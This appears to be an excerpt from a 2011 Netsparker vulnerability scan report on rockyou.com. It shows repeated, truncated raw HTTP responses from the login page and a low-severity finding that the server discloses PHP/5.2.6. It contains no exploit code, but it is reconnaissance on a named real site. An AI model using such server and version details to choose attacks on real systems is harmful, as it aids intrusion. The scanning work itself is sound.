Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 21:53:51 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 21:53:52 GMT; path=/; domain=.rockyou.com,lastlogin=1303163632; expires=Wed, 27-Jul-2011 21:53:52 GMT; path=/; domain=.rockyou.com,sns_type=deleted; expires=Sun, 18-Apr-2010 21:53:51 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=11872 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 8995
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:block"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value=""><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value=""><br /><input type="hidden" name="user" id="user" value=""><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option value="1911&..
Date: Mon, 18 Apr 2011 21:53:52 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 21:53:51 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 21:53:52 GMT; path=/; domain=.rockyou.com,lastlogin=1303163632; expires=Wed, 27-Jul-2011 21:53:52 GMT; path=/; domain=.rockyou.com,sns_type=deleted; expires=Sun, 18-Apr-2010 21:53:51 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=11872 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 8995
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:block"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value=""><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value=""><br /><input type="hidden" name="user" id="user" value=""><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option value="1911&..
PHP Version Disclosure
PHP Version Disclosure
1
TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.
Impact
An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
|
- /login.php
/login.php |
Extracted Version
PHP/5.2.6
Request
GET /login.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 21:53:55 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 21:53:54 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 21:53:55 GMT; path=/; domain=.rockyou.com,lastlogin=1303163635; expires=Wed, 27-Jul-2011 21:53:55 GMT; path=/; domain=.rockyou.com,sns_type=deleted; expires=Sun, 18-Apr-2010 21:53:54 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=11297 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 8996
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ 